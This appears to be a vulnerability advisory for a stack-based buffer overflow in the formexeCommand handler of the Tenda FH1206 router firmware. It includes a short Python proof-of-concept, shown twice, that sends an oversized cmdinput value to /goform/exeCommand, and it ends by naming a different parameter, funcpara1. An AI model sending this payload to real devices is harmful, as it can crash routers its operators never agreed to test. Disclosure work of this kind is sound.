
Tenda FH1206 V1.2.0.8(8155)_EN

Affected version


Vulnerability details

The Tenda FH1206 V1.2.0.8(8155)_EN has a stack overflow vulnerability located in the formexeCommand function. The src variable receives the cmdinput parameter from a POST request and is later assigned to the v7 variable, which is fixed at 512 bytes. However, since the user can control the input of cmdinput, the statement strcpy(v7, src); can cause a buffer overflow. The user-provided cmdinput can exceed the capacity of the v7 array, triggering this security vulnerability.



# formexeCommand 

import requests

ip = ''

url = f"http://{ip}/goform/exeCommand"

data = {'cmdinput':'a'*999}

ret = requests.post(url, data)


Additional Information

Tenda FH1206 

the "formexeCommand " function of /bin/httpd; /bin/httpd

use a simple exp to attack, like this:
import requests
ip = ''
url = f"http://{ip}/goform/exeCommand"
data = {'cmdinput':'a'*999}
ret = requests.post(url, data)

Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter at ip/goform/exeCommand.
